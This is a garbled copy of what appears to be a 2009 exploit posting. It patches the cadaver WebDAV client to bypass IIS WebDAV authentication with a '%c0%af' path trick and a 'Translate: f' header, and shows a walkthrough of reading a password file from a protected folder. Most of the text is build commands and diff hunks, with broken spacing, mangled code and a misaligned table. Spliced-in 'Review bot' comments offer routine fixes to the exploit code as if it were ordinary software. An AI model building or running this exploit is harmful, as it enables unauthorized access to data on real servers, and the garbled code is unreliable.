# Blog with a detailed description: # http://www.skullsecurity.org/blog? P = 285 # And the patch itself: # http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch##> mkdir cadaver-h4x #> Cd cadaver-h4x #> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch# -- snip -- #> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz# -- snip -- #> tar xzvf cadaver-0.23.2.tar.gz # -- snip -- #> Cd cadaver-0.23.2 /#> patch-P1 <.. cadaver-0.23.2-h4x.patch # Patchi Ng file lib/neon/ne_basic.c # patching file lib/neon/ne_request.c # patching file lib/neon/ne_uri.c #>. /configure # -- snip -- #> make # -- snip -- # Now we shoshould have a patched, compiled version of cadaver, so start it # Up With the server that was identified as having a vulnerable folder # earlier: ##>. /cadaver XXX. xxx. xxx. xxx # This shoshould drop you to a "Dav:/>" prompt. now just CD into the # vulnerabl E folder and check out what's there: # Dav:/> Cd Secret # Dav:/secret/> ls # listing collection '/secret/': succeeded. # password.txt 7 May 19 10:40 # Dav:/secret/> CAT password.txt # displaying '/secret/password.txt': # Ron $ pr0ns # Dav: /secret/> # Here's a list of commands that I 've tested that work with the patched # cadaver on a vulnerable Folder: # * CD # ** ls # * move # * put # * Get # * Cat # * deletediff -Rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c --- cadaver-0.23.2/lib/neon/ne_basic.c2008-02-07 16:22:07. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_basic.c2009-05-20 16:13:46. 000000000-0500 @-402,7 + 402,7 @ value = "infinity"; break;}-ne_add_request_header (req, "depth", value); + ne_add_request_header (req, "depth", "1");} static int copy_or_move (ne_session * se SS, int is_move, int overwrite, diff-rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c --- cadaver-0.23.2/lib/neon/ne_request.c2008-01-30 05:35:52. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_request.c2009-05-20 16:35:46. 
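Review bot: With the `Depth` header hard-coded to `"1"`, the `value` variable filled in by the switch just above (`value = "infinity"; break;` is still visible as context) is assigned but never read, so a `-Wall` build will report it as set-but-unused and the function's depth parameter no longer has any effect. Either remove the switch together with the `value` local, or keep `ne_add_request_header(req, "Depth", value);` and have the caller pass the depth it wants, so the request header and the function's contract stay in agreement. The enclosing function begins before this hunk, so the switch and the declaration of `value` are outside what is shown here.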
000000000-0500 @-405, 6 + 405, 7 @ "connection: Te" EOL "te: Trailers" EOL);} + ne_buffer_czappend (req-> headers, "translate: f "EOL);} int ne_accep T_always (void * userdata, ne_request * req, const ne_status * st) @-420,6 + 421,7 @ ne_request * ne_request_create (ne_session * sess, const char * method, const char * path) {+ char * path2 = ne_calloc (strlen (PATH) + 7); ne_request * Req = ne_calloc (sizeof * req); req-> session = sess; @-435,13 + 437,18 @ req-> method = ne_strdup (method); req-> method_is_head = (strcmp (method, "head") = 0 ); + If (strlen (PATH)> 2) + spri Ntf (path2, "% C % C0 % af % s", path [0], path [1], path + 2 ); + else + path2 = path; +/* only use an absoluteuri here when absolutely necessary: Some * servers can't parse them. */-If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path [0] = '/') + If (req-> session-> use_proxy &&! REQ-> session-> use_ssl & path2 [0] = '/') req-> uri = ne_concat (req-> session-> scheme ,"://", -req-> session-> server. hostport, path, null); + req-> session-> server. hostport, path2, null); else-req-> uri = ne_strdup (PATH); + req-> uri = ne_strdup (path2); {struct hook * HK; diff-rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c --- cadaver-0.23.2/lib/neon/ne_uri.c2007-12-05 05:04:47. 000000000-0600 + + cadaver-0.23.2-h4x/lib/neon/ne_uri.c2009-05-20 16:13:46. 000000000-0500 @-+ @/* 0xxx x0 X2 X4 X6 X8 xa xc Xe * // * 0x */OT, ot, OT, ot,/* 1x */OT, ot, OT, ot,-/* 2x */OT, SD, ot, Gd, SD, PC, SD, SD, PS, SD, DS, DT, FS, ++/* 2x */OT, SD, ot, Gd, SD, Al, SD, SD, SD, PS, SD, DS, DT, FS,/* 3x */DG, DG, DG, Cl, SD, ot, SD, ot, Qu,/* 4x */At, Al, al,/* 5x */Al, Al, GD, ot, Gd, ot, US, # milw0rm.com [2009-05-21]
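Review bot: In the `ne_request_create` hunk, `path2` is allocated with `ne_calloc(strlen(path) + 7)` in the earlier hunk of the same file and then, in the `else` branch, overwritten with `path` itself, so the allocation is leaked whenever `strlen(path) <= 2`; on the other branch it is only copied into `req->uri` via `ne_strdup`/`ne_concat` and is never released either. Keep the buffer in both branches, e.g. `else snprintf(path2, strlen(path) + 7, "%s", path);`, and free `path2` once `req->uri` has been built; using `snprintf` with the same computed size in the first branch also documents why `+ 7` is enough. The format string as printed here (`"% C % C0 % af % s"`) does not look like valid conversion specifiers, which is presumably listing garbling rather than the patch's actual text, but it is worth confirming against the original. The function continues past the end of the hunk.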
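Review bot: In the `ne_uri.c` hunk the removed `2x` row has 13 entries while the added row has 14 (`... SD, Al, SD, SD, SD, PS, ...` against `... SD, PC, SD, SD, PS, ...`), so besides changing the class of 0x25 (`%`) from `PC` to `Al` the new line inserts an extra `SD`, which would shift every later entry of this position-encoded table by one column. If that extra entry is not an artefact of this listing, it should be dropped so the row keeps its width. Because nothing in the table says which character a column is, the change also deserves a comment on the edited entry such as `/* 0x25 '%': was PC */` so a later reader can tell what was altered and why.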